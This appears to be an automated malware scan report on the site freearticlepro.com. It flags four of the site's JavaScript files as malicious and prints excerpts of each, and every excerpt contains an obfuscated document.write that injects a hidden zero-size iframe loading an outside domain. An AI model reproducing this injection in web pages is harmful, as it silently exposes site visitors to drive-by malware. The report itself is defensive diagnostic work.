Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=freearticlepro.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://freearticlepro.com/ | 200 OK Content-Length: 12106 Content-Type: text/html | clean |
http://freearticlepro.com/js/jquery.js | 200 OK Content-Length: 69988 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o] document.write('<ifr'+'ame frameborder="0" height="0" name="frame1" scrolling="no" src="http://sstew.forgottencelebs.com/home/1/" width="0"></ifr'+'ame>'); Antivirus reports:
| ||
http://freearticlepro.com/js/articlems.js | 200 OK Content-Length: 741 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function add_media(media){ $('#'+media.insert_id).attr('value',media.id); if (media.type == 'files'){ $('#input_'+media.insert_id).html('<a href="'+media.url+'">'+media.title+'</a> <a href="#here" title="Remove" onclick="remove_media(\''+media.insert_id+'\')">[x]</a>'); } else{ $('#input_'+media.insert_id).html('<img src="'+media.url+'"> <a href="#here" title="Remove" onclick="remove_media(\''+media.insert_id+'\')">[x]</a>'); } $.fn.fancybox.close(); } function remove_media(insert_id){ $('#'+insert_id).attr('value',0); $('#input_'+insert_id).html(''); } document.write('<ifr'+'ame frameborder="0" height="0" name="frame1" scrolling="no" src="http://sstew.forgottencelebs.com/home/1/" width="0"></ifr'+'ame>'); Decoded script: <iframe frameborder="0" height="0" name="frame1" scrolling="no" src="http://sstew.forgottencelebs.com/home/1/" width="0"></iframe> Antivirus reports:
| ||
http://freearticlepro.com/js/treeview/jquery.cookie.js | 200 OK Content-Length: 4094 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { options = options || {}; if (value === null) { value = ''; options.expires = -1; } var expires = ''; if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) { var date; if (typeof options.expires == 'number') { date = new Da if (cookie.substring(0, name.length + 1) == (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } }; document.write('<ifr'+'ame frameborder="0" height="0" name="frame1" scrolling="no" src="http://sstew.forgottencelebs.com/home/1/" width="0"></ifr'+'ame>'); Antivirus reports:
| ||
http://freearticlepro.com/js/treeview/jquery.treeview.js | 200 OK Content-Length: 7996 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { $.extend($.fn, { swapClass: function(c1, c2) { var c1Elements = this.filter('.' + c1); this.filter('.' + c2).removeClass(c2).addClass(c1); c1Elements.removeClass(c1).addClass(c2); return this; }, replaceClass: function(c1, c2) { return this.filter('.' + c1).removeClass(c1).addClass(c2).end(); }, hoverClass: function(className) { className = className || "hover"; return this.hover(function() { collapsableHitarea: "collapsable-hitarea", lastCollapsableHitarea: "lastCollapsable-hitarea", lastCollapsable: "lastCollapsable", lastExpandable: "lastExpandable", last: "last", hitarea: "hitarea" }; $.fn.Treeview = $.fn.treeview; })(jQuery); document.write('<ifr'+'ame frameborder="0" height="0" name="frame1" scrolling="no" src="http://sstew.forgottencelebs.com/home/1/" width="0"></ifr'+'ame>'); Antivirus reports:
| ||
http://scripts.chitika.net/eminimalls/amm.js | 200 OK Content-Length: 60103 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21950 Content-Type: text/javascript | clean |
http://freearticlepro.com/submit/ | 200 OK Content-Length: 8629 Content-Type: text/html | clean |
http://api.recaptcha.net/challenge?k=6LfxTM4SAAAAAFK3MxmPcrCN4RFAob9FvCc7uIoY | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Fri, 11 Apr 2014 18:54:14 GMT Pragma: no-cache Location: http://www.google.com/recaptcha/api/challenge?k=6LfxTM4SAAAAAFK3MxmPcrCN4RFAob9FvCc7uIoY Server: GSE Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Alternate-Protocol: 80:quic X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
http://www.google.com/recaptcha/api/challenge?k=6lfxtm4saaaaafk3mxmpcrcn4rfaob9fvcc7uioy | 200 OK Content-Length: 67 Content-Type: text/javascript | clean |
http://freearticlepro.com/search/ | 200 OK Content-Length: 11540 Content-Type: text/html | clean |
http://freearticlepro.com/latest/?fmt=rss | 200 OK Content-Length: 36044 Content-Type: text/xml | clean |
http://freearticlepro.com/test404page.js | 404 Not Found Content-Length: 7844 Content-Type: text/html | clean |
http://freearticlepro.com/login/ | 200 OK Content-Length: 8498 Content-Type: text/html | clean |
http://freearticlepro.com/register/ | 200 OK Content-Length: 8601 Content-Type: text/html | clean |
http://freearticlepro.com/latest/ | 200 OK Content-Length: 11843 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: freearticlepro.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 11 Apr 2014 18:55:19 GMT
Pragma: no-cache
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=a523eee811c22d1792372f5078f1791e; path=/
GET / HTTP/1.1
Host: freearticlepro.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 11 Apr 2014 18:55:19 GMT
Pragma: no-cache
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=a523eee811c22d1792372f5078f1791e; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: freearticlepro.com
Referer: http://www.google.com/search?q=freearticlepro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: freearticlepro.com
Referer: http://www.google.com/search?q=freearticlepro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.